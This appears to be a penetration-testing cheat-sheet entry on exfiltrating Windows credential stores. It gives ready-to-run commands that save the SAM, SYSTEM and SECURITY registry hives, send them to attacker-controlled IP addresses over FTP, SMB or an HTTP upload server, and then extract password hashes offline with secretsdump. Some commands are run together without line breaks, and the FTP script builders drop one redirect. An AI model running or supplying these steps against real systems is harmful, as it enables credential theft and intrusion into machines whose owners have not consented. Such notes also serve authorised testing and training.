Exfiltration
Dump the SAM hive to the pwd
reg.exe save HKLM\SAM C:\programdata\sam.bakDump the System hive to the pwd
reg.exe save HKLM\SYSTEM C:\programdata\system.bakDump the Security hive to the pwd
reg.exe save HKLM\SECURITY C:\programdata\security.bakSpin up an smb server
impacket-smbserver share share/ -smb2supportecho open 10.9.254.6 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txt
ftp -v -n -s:ftp.txtExfiltrate data
python3 -m uploadservercurl -X POST http://HOST/upload -H -F '[email protected]'OR
python -m pyftpdlib -p 21 --writeecho open 192.168.45.237 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txtftp -v -n -s:ftp.txtOR
New-SmbMapping -LocalPath A: -RemotePath \\192.168.229.121\share -TcpPort 8888net use "\\192.168.171.121\adot8"
copy sam.bak "\\192.168.171.121\adot8\sam.bak"
copy system.bak "\\192.168.171.121\adot8\system.bak"
copy security.bak "\\192.168.171.121\adot8\security.bak"Dump hashes with secretsdump
secretsdump.py -sam sam.bak -system system.bak -security security.bak localLast updated